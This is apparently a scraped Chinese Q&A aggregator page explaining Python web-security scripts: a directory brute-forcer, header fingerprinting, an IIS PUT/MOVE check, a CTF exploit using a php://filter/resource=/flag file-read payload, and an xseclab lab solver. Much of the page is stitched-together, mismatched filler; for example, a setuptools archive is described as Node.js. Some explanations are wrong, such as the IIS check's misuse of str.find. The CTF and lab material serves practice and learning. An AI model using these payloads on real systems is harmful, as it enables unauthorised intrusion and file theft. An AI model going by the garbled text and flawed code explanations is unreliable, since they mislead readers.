代码逐行注释(import sys import requests url = sys.argv[1] dictionary = sys.argv[2] with open(dictionary, mode="r", encoding="UTF-8") as file: for line in file.readlines(): line = line.strip() request = requests.get(url + line) if request.status_code == 200: print(f"URL:{url}{line} Target exists") else: print(f"URL:{url}{line} Target isn't exists"))

时间: 2024-04-28 19:21:27 浏览: 11
这段代码是一个简单的命令行程序,用于检查指定 URL 是否存在指定字典中的目标。 首先,我们导入了 `sys` 和 `requests` 模块。`sys.argv` 是一个列表,其中包含命令行参数。`sys.argv[1]` 是第二个命令行参数,即 URL。`sys.argv[2]` 是第三个命令行参数,即字典文件路径。 接下来,我们打开字典文件,并使用 `for` 循环遍历每一行。`line.strip()` 可以去除每行末尾的空格和换行符,以便于后续处理。 然后,我们使用 `requests.get()` 方法向指定 URL 发送 GET 请求,并将结果存储在 `request` 变量中。`request.status_code` 是请求的 HTTP 状态码,如果为 200,则表示请求成功。 最后,根据请求结果输出相应的信息,如果目标存在,则输出 `URL:{url}{line} Target exists`,否则输出 `URL:{url}{line} Target isn't exists`。 总之,这段代码是一个简单的命令行工具,用于检查指定 URL 是否存在指定字典中的目标。
相关问题

代码优化(import sys import requests # url = "http://192.168.2.118" url = sys.argv[1] request = requests.get(url) server = request.headers["server"] language = request.headers["X-Powered-By"] print(f"中间件:{server}\n脚本语言:{language}"))

这段代码可以进行如下优化: 1. 在导入 requests 库时,可以使用别名,避免每次使用时输入长长的库名,比如 `import requests as req`。 2. 在获取 URL 时,可以使用 argparse 库解析命令行参数,避免手动输入 URL,同时也可以添加更多的参数选项。 3. 在获取响应头字段时,可以使用 get 方法,避免出现 KeyError 异常。 4. 在打印输出时,可以使用 f-string 格式化字符串,使代码更加简洁。 下面是优化后的代码: ``` import argparse import requests as req parser = argparse.ArgumentParser() parser.add_argument("url", help="the URL to request") args = parser.parse_args() response = req.get(args.url) server = response.headers.get("Server", "unknown") language = response.headers.get("X-Powered-By", "unknown") print(f"中间件:{server}\n脚本语言:{language}") ``` 在命令行中使用时,可以像下面这样传入 URL: ``` python script.py http://example.com ```

代码逐行解释(import sys import requests # url = "http://www.baidu.com" url = sys.argv[1] request = requests.options(url) print(request.headers["Public"]) #查看所支持方法 result = request.headers["Public"] if result.find("PUT") and result.find("MOVE"): print(f"URL:{url}\nIIS vulnerability exists in this website!") else: print(f"URL:{url}\nThe website does not have IIS vulnerabilities"))

好的,让我逐行解释一下这段代码的作用: 1. `import sys import requests` :导入 `sys` 和 `requests` 模块。 2. `url = sys.argv[1]` :从命令行参数中获取第一个参数作为要扫描的 URL,赋值给变量 `url`。 3. `request = requests.options(url)` :使用 `requests` 模块发送 `OPTIONS` 请求到指定的 URL,获取响应,赋值给变量 `request`。 4. `print(request.headers["Public"])` :输出响应头中 `Public` 字段的值,即服务器支持的 HTTP 方法。 5. `result = request.headers["Public"]` :将响应头中 `Public` 字段的值赋值给变量 `result`。 6. `if result.find("PUT") and result.find("MOVE"):` :判断 `result` 中是否同时包含 `PUT` 和 `MOVE` 方法,即是否存在 IIS 漏洞。 7. `print(f"URL:{url}\nIIS vulnerability exists in this website!")` :如果存在 IIS 漏洞,输出 URL 和提示信息。 8. `else: print(f"URL:{url}\nThe website does not have IIS vulnerabilities")` :如果不存在 IIS 漏洞,输出 URL 和另一条提示信息。 总的来说,这段代码的作用就是检测一个给定的网站是否存在 IIS 漏洞。它发送一个 OPTIONS 请求到给定的 URL,然后检查响应头中是否存在 PUT 和 MOVE 方法。如果存在,则认为该网站存在 IIS 漏洞,否则认为该网站没有 IIS 漏洞。

相关推荐

url

import requests获取网页源代码.docx.url

import requests获取网页源代码.docx.url
doc

python调试文件时发生import requests报错.doc

python调试文件时发生import requests报错,先填写环境变量,如何一步步完成pip安装过程。
ini

1_import requests #导入请求包.ini

1_import requests #导入请求包.ini

import sys import requests try: HOST = sys.argv[1] PORT = sys.argv[2] except: pass header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" } url = f"http://{HOST}:{PORT}" def exp_1(): exp_1()我怎么在现有的代码中去添加代码去利用这个漏洞去获取flag

response = requests.get(target_url, headers=header) # 解析响应,查找 flag if "flag" in response.content.decode(): print("Flag found:", response.content.decode()) else: print("Flag not found.") ...

import sys import requests try: HOST = sys.argv[1] PORT = sys.argv[2] except: pass uri = f"http://{HOST}:{PORT}" def upload(): url = uri + '/index.php' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0', } data = {'file':'php://filter/resource=/flag'} response = requests.post(url=url,data=data,headers=headers) print(response.text) upload()

在 upload() 函数中,使用 requests.post() 方法发送请求,其中 url 是请求的目标地址,headers 是请求头,data 是请求的数据体。这里的 data 参数指定了上传的文件名为 php://filter/resource=/flag...

代码逐行注释(import argparse import requests as req parser = argparse.ArgumentParser() parser.add_argument("url", help="the URL to request") args = parser.parse_args() response = req.get(args.url) server = response.headers.get("Server", "unknown") language = response.headers.get("X-Powered-By", "unknown") print(f"中间件:{server}\n脚本语言:{language}"))

import argparse # 导入 argparse 库,用于解析命令行参数 import requests as req # 导入 requests 库,用于发送 HTTP 请求 # 创建一个解析器对象 parser = argparse.ArgumentParser() # 添加一个命令行参数,...

import sys import requests # url = "http://www.baidu.com" url = sys.argv[1] request = requests.options(url) print(request.headers["Public"]) #查看所支持方法 result = request.headers["Public"] if result.find("PUT") and result.find("MOVE"): print(f"URL:{url}\nIIS vulnerability exists in this website!") else: print(f"URL:{url}\nThe website does not have IIS vulnerabilities")

在这段代码中,sys.argv[1] 表示从命令行参数中获取第一个参数作为要扫描的 URL。requests.options(url) 用于发送 OPTIONS 请求并获取响应。request.headers["Public"] 获取响应头中的 Public 字段,该字段列出了...

对以下代码做出注释import requests import re s = requests.Session() url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php" html = s.get(url).content.decode('utf-8') reg = r'([0-9].+)=<' pattern = re.compile(reg) match = re.findall(pattern, html) payload = {'v': eval(match[0])} print(s.post(url, data=payload).text)

s = requests.Session() # 目标URL url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php" # 获取目标URL的HTML源码 html = s.get(url).content.decode('utf-8') # 使用正则表达式...

对以下代码添加注释import requests import re s = requests.Session() url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php" html = s.get(url).content.decode('utf-8') reg = r'([0-9].+)=<' pattern = re.compile(reg) match = re.findall(pattern, html) payload = {'v': eval(match[0])} print(s.post(url, data=payload).text)

s = requests.Session() # 指定目标网址 url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php" # 发送请求并获取响应内容,使用utf-8编码进行解码 html = s.get(url).content....

可以这样写:with open('url_list.txt') as f: for line in f: url = line.strip() response = requests.get(url) data = response.text ,解释每行代码的作用

1. with open('url_list.txt') as f::打开名为"url_list.txt"的文本文件,并将文件对象赋值给变量f。使用with语句可以自动确保文件在使用后正确关闭。 2. for line in f::对于文件对象f中的每一行,依次执行...

翻译代码:import requests sk = requests.get('https://www.baidu.com').text print(sk)

这个代码使用了 Python 的 requests 库来发送 HTTP 请求,从百度网站...import requests # 导入 requests 库 sk = requests.get(https://www.baidu.com).text # 发送 HTTP 请求并获取网页内容 print(sk) # 打印网页内容

对以下代码做出注释import re import requests s = requests.Session() url = r'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php' r = s.get(url) r.encoding = 'utf-8' num = re.findall(re.compile(r'
\s+(.*?)='), r.text)[0] print ('result:\n\n%s=%d\n' % (num, eval(num))) r = s.post(url, data={'v': eval(num)}) print (r.text)

s = requests.Session() # 目标URL url = r'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php' # GET请求获取页面内容 r = s.get(url) # 将页面内容编码转为UTF-8 r.encoding = 'utf-8'...

请使用python为下列代码编写一个GUI,要求:类似聊天窗口,ip地址和端口号在代码中确定,不能更改。代码: import socket import time import sys import requests import re IP = '192.168.185.60' # 填写服务器端的IP地址 port = 8888 # 端口号 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((IP, port)) except Exception as e: print('server not find or not open') sys.exit() while True: trigger = input("send:") s.sendall(trigger.encode()) data = s.recv(1024) data = data.decode() data2 = {'doctype': 'json', 'type': 'auto', 'i': ''} data2['i'] = data r = requests.get("http://fanyi.youdao.com/translate", params=data2) # 访问翻译网站 result = r.json() # 获取翻译内容 t1 = result.setdefault('translateResult') t2 = t1[0] t3 = t2[0] # 解层翻译内容 localTime = time.asctime(time.localtime(time.time())) print(localTime,'received:', data) if trigger.lower() == 'Mint': # 发送Mint结束连接 break s.close()

r = requests.get("http://fanyi.youdao.com/translate", params=data2) # 访问翻译网站 result = r.json() # 获取翻译内容 t1 = result.setdefault('translateResult') t2 = t1[0] t3 = t2[0] # 解层翻译内容 ...

使用python为下列代码加上一个GUI,类似聊天窗口,要求:ip地址和接口号在代码中确认,不能更改。代码:import socket import time import sys import requests import re IP = '192.168.185.60' # 填写服务器端的IP地址 port = 8888 # 端口号 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((IP, port)) except Exception as e: print('server not find or not open') sys.exit() while True: trigger = input("send:") s.sendall(trigger.encode()) data = s.recv(1024) data = data.decode() data2 = {'doctype': 'json', 'type': 'auto', 'i': ''} data2['i'] = data r = requests.get("http://fanyi.youdao.com/translate", params=data2) # 访问翻译网站 result = r.json() # 获取翻译内容 t1 = result.setdefault('translateResult') t2 = t1[0] t3 = t2[0] # 解层翻译内容 localTime = time.asctime(time.localtime(time.time())) print(localTime, 'receive:', t3.setdefault('tgt')) if trigger.lower() == 'Mint': # 发送Mint结束连接 break s.close()

为代码加上一个GUI,可以使用Python中的tkinter模块。可以按照以下步骤进行: 1.导入tkinter模块。 2.创建主窗口。 3.创建文本框和滚动条,用于显示聊天记录。 4.创建输入框和发送按钮,用于发送消息。 5.创建...

翻译这段代码 nb = requests.get(url, headers=head).text from lxml import etree sb = etree.HTML(nb) whh = sb.xpath('//tbody/tr[not(@class)]')

我理解你的意思是,你想要翻译这段代码:nb = requests.get(url, headers=head).text from lxml import etree sb = etree.HTML(nb) whh = sb.xpath('//tbody/tr[not(@class)]'),对吧?翻译如下:nb = ...

# -*-coding = utf-8-*- import requests import re import os url = 'https://pic.netbian.com/' headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67' } requests = requests.get(url=url, headers=headers) requests = encoding = requests.apparent_encoding parr = re.compile('src="(/u.*?)".alt="(.*?)"') image = parr.findall(requests.text) path = '测试' if not os.path.isdir(path): os.mkdir(path) for i in image: link = i[0] # 获取链接 name = i[1] # 获取名字 with open(path + "/{}.jpg".format(name), "wb") as img: res = requests.get("https://pic.netbian.com/" + link) img.write(res.content) img.close() print(name+".jpg 获取成功....")

response = requests.get(url=url, headers=headers) text_content = response.text image = parr.findall(text_content) 这样,你就创建了一个名为response的变量来存储请求的响应,然后使用.text属性获取...
zip

aha154x.zip_Download aha154x.sys_The Power_adaptec aha-154x_mini

This driver exports several functions which are used by SCSIPORT.SYS to issue SCSI requests to the devices attached to the controller, process adapter interrupts, and various other SCSI activities. ...

最新推荐

recommend-type

Python requests.post方法中data与json参数区别详解

主要介绍了Python requests.post方法中data与json参数区别详解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
recommend-type

软考-考生常见操作说明-202405101400-纯图版.pdf

软考官网--2024常见操作说明:包括如何绘制网络图、UML图、表格等 模拟作答系统是计算机技术与软件专业技术资格(水平)考试的电子化考试系统界面、作答过程的仿真系统,为各级别、各资格涉及输入和页面显示的部分题型提供体验性练习。
recommend-type

setuptools-34.0.3.zip

Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
recommend-type

基于遗传优化GA的三目标优化仿真【包括程序,注释,操作步骤】

1.版本:matlab2022A。 2.包含:程序,中文注释,仿真操作步骤(使用windows media player播放)。 3.领域:遗传优化 4.仿真效果:仿真效果可以参考博客同名文章《基于遗传优化GA的三目标优化仿真》 5.内容:基于遗传优化GA的三目标优化仿真。遗传算法(Genetic Algorithm, GA)是一种模拟自然选择和遗传机制的全局搜索优化方法,广泛应用于解决复杂优化问题,包括具有多个目标的优化问题,即多目标遗传算法(Multi-Objective Genetic Algorithm, MOGA)。在这里,将三个目标函数进行统一的编码,通过单目标遗传优化的方式,同步求解三个目标函数的最优值。 6.注意事项:注意MATLAB左侧当前文件夹路径,必须是程序所在文件夹位置,具体可以参考视频录。
recommend-type

基于单通道脑电信号的自动睡眠分期研究.zip

本项目使用了Sleep-EDF公开数据集的SC数据进行实验,一共153条整晚的睡眠记录,使用Fpz-Cz通道,采样频率为100Hz 整套代码写的较为简洁,而且有添加相应的注释,因此进行分享,而且不仅仅说是睡眠分期,也可以作为学习如何使用神经网络去进行时序数据分类问题的一个入门项目,包括怎么用GRU、LSTM和Attention这些经典网络结构。 网络结构(具体可查看network.py文件): 网络整体结构类似于TinySleepNet,对RNN部分进行了修改,增加了双向RNN、GRU、Attention等网络结构,可根据参数进行调整选择。 定义了seq_len参数,可以更灵活地调整batch_size与seq_len。 数据集加载(具体可查看dataset.py文件) 直接继承自torch的Dataset,并定义了seq_len和shuffle_seed,方便调整输入,并复现实验。 训练(具体可查看train.py文件):
recommend-type

zigbee-cluster-library-specification

最新的zigbee-cluster-library-specification说明文档。
recommend-type

管理建模和仿真的文件

管理Boualem Benatallah引用此版本:布阿利姆·贝纳塔拉。管理建模和仿真。约瑟夫-傅立叶大学-格勒诺布尔第一大学,1996年。法语。NNT:电话:00345357HAL ID:电话:00345357https://theses.hal.science/tel-003453572008年12月9日提交HAL是一个多学科的开放存取档案馆,用于存放和传播科学研究论文,无论它们是否被公开。论文可以来自法国或国外的教学和研究机构,也可以来自公共或私人研究中心。L’archive ouverte pluridisciplinaire
recommend-type

实现实时数据湖架构:Kafka与Hive集成

![实现实时数据湖架构:Kafka与Hive集成](https://img-blog.csdnimg.cn/img_convert/10eb2e6972b3b6086286fc64c0b3ee41.jpeg) # 1. 实时数据湖架构概述** 实时数据湖是一种现代数据管理架构,它允许企业以低延迟的方式收集、存储和处理大量数据。与传统数据仓库不同,实时数据湖不依赖于预先定义的模式,而是采用灵活的架构,可以处理各种数据类型和格式。这种架构为企业提供了以下优势: - **实时洞察:**实时数据湖允许企业访问最新的数据,从而做出更明智的决策。 - **数据民主化:**实时数据湖使各种利益相关者都可
recommend-type

解释minorization-maximization (MM) algorithm,并给出matlab代码编写的例子

Minorization-maximization (MM) algorithm是一种常用的优化算法,用于求解非凸问题或含有约束的优化问题。该算法的基本思想是通过构造一个凸下界函数来逼近原问题,然后通过求解凸下界函数的最优解来逼近原问题的最优解。具体步骤如下: 1. 初始化参数 $\theta_0$,设 $k=0$; 2. 构造一个凸下界函数 $Q(\theta|\theta_k)$,使其满足 $Q(\theta_k|\theta_k)=f(\theta_k)$; 3. 求解 $Q(\theta|\theta_k)$ 的最优值 $\theta_{k+1}=\arg\min_\theta Q(
recommend-type

JSBSim Reference Manual

JSBSim参考手册,其中包含JSBSim简介,JSBSim配置文件xml的编写语法,编程手册以及一些应用实例等。其中有部分内容还没有写完,估计有生之年很难看到完整版了,但是内容还是很有参考价值的。